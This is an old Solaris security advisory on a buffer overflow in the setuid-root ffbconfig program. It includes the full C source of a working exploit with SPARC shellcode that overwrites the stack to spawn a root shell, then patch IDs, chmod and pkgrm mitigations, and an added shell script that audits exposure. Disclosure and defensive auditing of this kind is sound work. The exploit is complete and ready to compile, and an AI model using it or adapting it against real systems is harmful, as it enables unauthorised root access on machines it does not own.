COMMAND
/usr/sbin/ffbconfig
SYSTEMS AFFECTED
Solaris 2.4 with the Fast Buffer Graphics Accelerator card
installed.
PROBLEM
The ffbconfig program configures the Fast Frame Buffer (FFB)
Graphics Accelerator, and is part of the FFB Configuration
Software package, SUNWffbcf. This software is only of use if the
FFB Graphics Accelerator card is installed. If the device
/dev/fbs/ffb0 exists, it may indicate that the card is installed.
Due to insufficient bounds checking on arguments which are
supplied by users, it is possible to overwrite the internal stack
space of the ffbconfig program while it is executing. By
supplying a carefully designed argument to the ffbconfig program,
intruders may be able to force ffbconfig to execute arbitrary
commands. As ffbconfig is setuid root, this may allow intruders
to run arbitrary commands with root privileges.
Cristian SCHIPOR <skipo@SUNDY.CS.PUB.RO> has found a buffer
overflow hole in ffbconfig (Solaris 2.x) that allows you to gain
root access on your machine. He used an exploit written by Jeremy
Elson for the gethostbyname() buffer overflow hole (he modified some
values to make it work). Here is Cristian's exploit:
/*
 * This works on Solaris 2.4 with /usr/sbin/ffbconfig from a Solaris 2.5
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* strlen */
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH   128          /* NOP sled plus shellcode */
#define EXTRA        256          /* copies of the guessed return address */
#define STACK_OFFSET 128          /* guessed distance below our own %sp */
#define SPARC_NOP    0xa61cc013   /* harmless SPARC instruction used as filler */

u_char sparc_shellcode[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;

/* Return the current stack pointer (SPARC: %i0 is the return register). */
u_long get_sp(void)
{
    __asm__("mov %sp,%i0 \n");
}

int main(int argc, char *argv[])
{
    char    buf[BUF_LENGTH + EXTRA];
    u_long  targ_addr;
    u_long *long_p;
    u_char *char_p;
    int     i, code_length = strlen((char *) sparc_shellcode);

    /* Front of the argument: NOP sled padded out to BUF_LENGTH ... */
    long_p = (u_long *) buf;
    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
        *long_p++ = SPARC_NOP;

    /* ... followed by the shellcode itself ... */
    char_p = (u_char *) long_p;
    for (i = 0; i < code_length; i++)
        *char_p++ = sparc_shellcode[i];

    /* ... followed by EXTRA bytes of the guessed address, which overwrite
     * the saved return address when ffbconfig copies the argument without
     * a bounds check. */
    long_p = (u_long *) char_p;
    targ_addr = get_sp() - STACK_OFFSET;
    for (i = 0; i < EXTRA / sizeof(u_long); i++)
        *long_p++ = targ_addr;

    printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
           targ_addr, BUF_LENGTH, EXTRA, STACK_OFFSET);
    execl("/usr/sbin/ffbconfig", "ffbconfig", "-dev", buf, (char *) 0);
    perror("execl failed");
    return 1;
}
SOLUTION
The vulnerability relating to ffbconfig is fixed by the following
patches:
OS version Patch ID
---------- --------
SunOS 5.5.1 103796-09
SunOS 5.5 103076-09
The above-mentioned patches are listed in the Graphics section
under Unbundled Products at:
ftp://sunsolve1.sun.com/pub/patches/patches.html.
Alternatively, you can remove the setuid bit and the non-root execute
permissions:
# chmod 500 /usr/sbin/ffbconfig
# ls -l /usr/sbin/ffbconfig
-r-x------ 1 root bin 31436 Oct 14 1995 /usr/sbin/ffbconfig
or remove the SUNWffbcf package:
# /usr/sbin/pkgrm SUNWffbcf
A number of other packages are also associated with the FFB Graphics
Accelerator:
SUNWffb FFB System Software (Device Driver)
SUNWffbmn On-Line FFB Manual Pages
SUNWffbw FFB Window System Support
SUNWffbxg FFB XGL support
Although there is nothing to suggest that these packages contain
vulnerabilities, if you do not require their functionality, you
may also wish to remove them with the /usr/sbin/pkgrm command.
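As an added example (not part of the advisory, and not Sun's code), the following POSIX shell audit checks whether a ffbconfig binary is still setuid and executable by non-root users, whether the /dev/fbs/ffb0 device node exists, and prints the remediation the advisory gives; the function names and the "audit" argument are this example's own, and the paths default to the advisory's.

```shell
#!/bin/sh
# Added example, not part of the advisory: audit whether a ffbconfig binary
# is still in the exposed state (setuid plus execute permission for group or
# others) and whether the FFB device node is present. Paths are arguments so
# the audit can run against a staging copy; defaults are the advisory's paths.

# Exit status: 0 exposed, 1 already locked down (the chmod 500 state),
# 2 binary not installed.
ffb_exposed() {
    f=$1
    [ -f "$f" ] || return 2
    [ -u "$f" ] || return 1
    # Columns 5-10 of "ls -l" hold the group and other permission bits.
    gop=$(ls -ld "$f" | cut -c5-10)
    case $gop in
        *x*|*s*) return 0 ;;        # a non-root user can still execute it
    esac
    return 1
}

# Prints one of: absent, mitigated, exposed-no-card, exposed-card-present.
ffb_status() {
    f=${1:-/usr/sbin/ffbconfig}
    dev=${2:-/dev/fbs/ffb0}
    if ffb_exposed "$f"; then rc=0; else rc=$?; fi
    case $rc in
        2) echo absent ;;
        1) echo mitigated ;;
        0) if [ -e "$dev" ]; then echo exposed-card-present
           else echo exposed-no-card; fi ;;
    esac
}

# Human-readable report quoting the advisory's own remediation options.
ffb_report() {
    f=${1:-/usr/sbin/ffbconfig}
    st=$(ffb_status "$f" "${2:-/dev/fbs/ffb0}")
    echo "$f: $st"
    case $st in
        exposed-card-present) echo "  apply the vendor patch, or: chmod 500 $f" ;;
        exposed-no-card)      echo "  no FFB device node seen; consider: pkgrm SUNWffbcf" ;;
    esac
}

# Audit the real paths only when invoked as "ffb_audit.sh audit";
# sourcing the file merely defines the functions.
if [ "${1:-}" = audit ]; then ffb_report; fi
```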
There is also a report that this exploit yields UID 0 on a system
running AFS, but UID 0 alone means nothing there: you still do not
have root privileges over AFS files, because the AFS 'fs' command
takes over the role of 'chmod'.